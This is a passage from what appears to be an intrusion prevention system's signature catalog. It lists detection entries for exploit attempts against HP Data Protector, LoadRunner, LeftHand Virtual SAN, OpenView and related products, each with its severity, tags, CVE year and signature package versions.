Generic_CS-HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution

About this situation: An attempt to exploit a vulnerability in HP Data Protector
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP Data Protector, CVE2011, Windows not specific, HP Data Protector not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-813-5242
Vulnerability: HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Multiple-Opcodes-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-539-5211
Vulnerability: HP-Data-Protector-Crs-Multiple-Opcodes-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Multiple-Stack-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1610-5242
Vulnerability: HP-Data-Protector-Crs-Multiple-Stack-Buffer-Overflows
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-1091-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-532-5211
Last changed: sgpkg-ips-532-5211
Vulnerability: HP-Data-Protector-Crs-Opcode-1091-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-1092-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-1747-5242
Vulnerability: HP-Data-Protector-Crs-Opcode-1092-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-211-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1747-5242
Vulnerability: HP-Data-Protector-Crs-Opcode-211-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-215-And-263-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-533-5211
Vulnerability: HP-Data-Protector-Crs-Opcode-215-And-263-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-227-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-681-5211
Vulnerability: HP-Data-Protector-Crs-Opcode-227-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-234-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-535-5211
Vulnerability: HP-Data-Protector-Crs-Opcode-234-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-235-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-535-5211
Vulnerability: HP-Data-Protector-Crs-Opcode-235-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-259-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-530-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: HP-Data-Protector-Crs-Opcode-259-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-260-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: HP-Data-Protector-Crs-Opcode-260-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-264-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-1400-5242
Vulnerability: HP-Data-Protector-Crs-Opcode-264-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Crs-Opcode-305-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1747-5242
Vulnerability: HP-Data-Protector-Crs-Opcode-305-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Directory-Traversal

About this situation: HP Data Protector Directory Traversal
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP Data Protector, CVE2011, Windows not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution
Description:
Back to top

Generic_CS-HP-Data-Protector-Exec_Bar-Command-Execution

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-567-5211
Vulnerability: HP-Data-Protector-Exec_Bar-Command-Execution
Description:
Back to top

Generic_CS-HP-Data-Protector-Express-DtbClsLogin-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow in HP Data Protector Express detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Data Protector Application Recovery Manager, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-345-4219
Last changed: sgpkg-ips-345-4219
Vulnerability: HP-Data-Protector-Express-DtbClsLogin-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Express-Multiple-Stack-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in HP Data Protector Express detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector Express, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-465-5211
Last changed: sgpkg-ips-465-5211
Vulnerability: HP-Data-Protector-Express-Multiple-Stack-Buffer-Overflows
Description:
Back to top

Generic_CS-HP-Data-Protector-Express-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector Express detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP Data Protector Express, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-656-5211
Vulnerability: HP-Data-Protector-Express-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in HP Data Protector manager server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector Media Operations, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1070-5242
Vulnerability: HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-DOS

About this situation: An attempt to exploit a buffer overflow vulnerability in HP Data Protector manager server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector Media Operations, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Manager-RDS-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2011, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-374-4219
Vulnerability: HP-Data-Protector-Manager-RDS-Denial-Of-Service
Description:
Back to top

Generic_CS-HP-Data-Protector-Media-Operations-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in HP Data Protector Media Operations detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector Media Operations, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: HP-Data-Protector-Media-Operations-Denial-Of-Service
Description:
Back to top

Generic_CS-HP-Data-Protector-Media-Operations-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Data Protector Media Operations detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector Media Operations, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: HP-Data-Protector-Media-Operations-Directory-Traversal
Description:
Back to top

Generic_CS-HP-Data-Protector-Media-Operations-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in HP Data Protector Media Operations detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector Media Operations, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-623-5211
Vulnerability: HP-Data-Protector-Media-Operations-Memory-Corruption
Description:
Back to top

Generic_CS-HP-Data-Protector-Omniinet-Service-Null-Dereference-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in HP Data Protector Media Operations detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector Media Operations, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: HP-Data-Protector-Omniinet-Service-Null-Dereference-Denial-Of-Service
Description:
Back to top

Generic_CS-HP-Data-Protector-Opcode-1091-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2014, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1378-5242
Vulnerability: HP-Data-Protector-Opcode-1091-Directory-Traversal
Description:
Back to top

Generic_CS-HP-Data-Protector-Opcode-27-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1399-5242
Vulnerability: HP-Data-Protector-Opcode-27-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2014, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-598-5211
Vulnerability: HP-Data-Protector-Opcode-28-And-11-Command-Execution
Description:
Back to top

Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution-2

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2014, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-Data-Protector-Opcode-28-And-11-Command-Execution
Description:
Back to top

Generic_CS-HP-Data-Protector-Opcode-305-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2014, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: HP-Data-Protector-Opcode-305-Directory-Traversal
Description:
Back to top

Generic_CS-HP-Data-Protector-Opcode-42-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-Data-Protector-Opcode-42-Directory-Traversal
Description:
Back to top

Generic_CS-HP-Data-Protector-Opcode-45-And-46-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2013, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-Data-Protector-Opcode-45-And-46-Code-Execution
Description:
Back to top

Generic_CS-HP-Database-Archiving-Software-Giop-Opcode-0x0e-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Database Archiving Software detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Database Archiving Software, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-463-5211
Vulnerability: HP-Database-Archiving-Software-Giop-Opcode-0x0e-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Database-Archiving-Software-Giop-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Database Archiving Software detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Database Archiving Software, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: HP-Database-Archiving-Software-Giop-Parsing-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Diagnostics-Server-Buffer-Overflow

About this situation: An attempt to exploit an HP Diagnostics Server Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2011, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-812-5242
Vulnerability: HP-Diagnostics-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Intelligent-Management-Center-Buffer-Overflow

About this situation: An attempt to exploit an HP Intelligent Management Center Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: HP-Intelligent-Management-Center-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2011, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: HP-Intelligent-Management-Center-Img-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2011, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-Intelligent-Management-Center-Img-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Diag-Processing-BOF

About this situation: An attempt to exploit a vulnerability in HP LeftHand Virtual SAN Appliance detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LeftHand Virtual SAN Appliance, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-518-5211
Vulnerability: HP-Lefthand-Virtual-SAN-Appliance-Hydra-Diag-Processing-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Login-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP LeftHand Virtual SAN Appliance detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LeftHand Virtual SAN Appliance, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-Lefthand-Virtual-SAN-Appliance-Hydra-Login-Code-Execution
Description:
Back to top

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Ping-Processing-BOF

About this situation: An attempt to exploit a vulnerability in HP LeftHand Virtual SAN Appliance detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LeftHand Virtual SAN Appliance, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-514-5211
Vulnerability: HP-Lefthand-Virtual-SAN-Appliance-Hydra-Ping-Processing-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-SNMP-Processing-BOF

About this situation: An attempt to exploit a vulnerability in HP LeftHand Virtual SAN Appliance detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LeftHand Virtual SAN Appliance, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-518-5211
Vulnerability: HP-Lefthand-Virtual-SAN-Appliance-Hydra-SNMP-Processing-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Lefthand-Virtual-SAN-Hydra-Credential-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP LeftHand Virtual SAN Appliance detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LeftHand Virtual SAN Appliance, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-518-5211
Vulnerability: HP-Lefthand-Virtual-SAN-Appliance-Hydra-Credential-Information-Disclosure
Description:
Back to top

Generic_CS-HP-Linux-Imaging-And-Printing-Project-Command-Execution

About this situation: An attempt to exploit an HP Linux Imaging And Printing Project Command Execution detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, HP Linux Imaging And Printing Project, CVE2007, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: HP-Linux-Imaging-And-Printing-Project-Command-Execution
Description:
Back to top

Generic_CS-HP-LoadRunner-And-Performance-Center-Libxdrutil-Mxdr_String-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2017, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: HP-LoadRunner-And-Performance-Center-Libxdrutil-Mxdr_String-Heap-BOF
Description:
Back to top

Generic_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2015, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1589-5242
Vulnerability: HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-LoadRunner-Xdr-Data-Handling-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2013, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-562-5211
Vulnerability: HP-LoadRunner-Xdr-Data-Handling-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Mercury-LoadRunner-Agent-Commandline-Message-Buffer-Overflow

About this situation: Detects buffer overflow exploits against HP Mercury LoadRunner
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Mercury LoadRunner, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HP-Mercury-LoadRunner-Agent-Commandline-Message-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Application-Recovery-Manager-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Application Recovery Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP OpenView Application Recovery Manager, CVE2007, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-1700-5242
Vulnerability: HP-OpenView-Application-Recovery-Manager-Buffer-Overflow
HP-OpenView-Storage-Data-Protector-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Client-Configuration-Manager-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP OpenView Client Configuration Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView, CVE2006, Any Operating System not specific, HP OpenView not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: HP-OpenView-Client-Configuration-Manager-Radia-Notify-Daemon-Code-Execution
Description:
Back to top

Generic_CS-HP-OpenView-Network-Node-Manager-Denial-Of-Service-Exploit

About this situation: An exploit against a denial of service vulnerability in HP OpenView Network Node Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2009, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-268-3038
Last changed: sgpkg-ips-410-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Denial-Of-Service
Description:
Back to top

Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: TCP Client Stream Unknown
Severity: 7
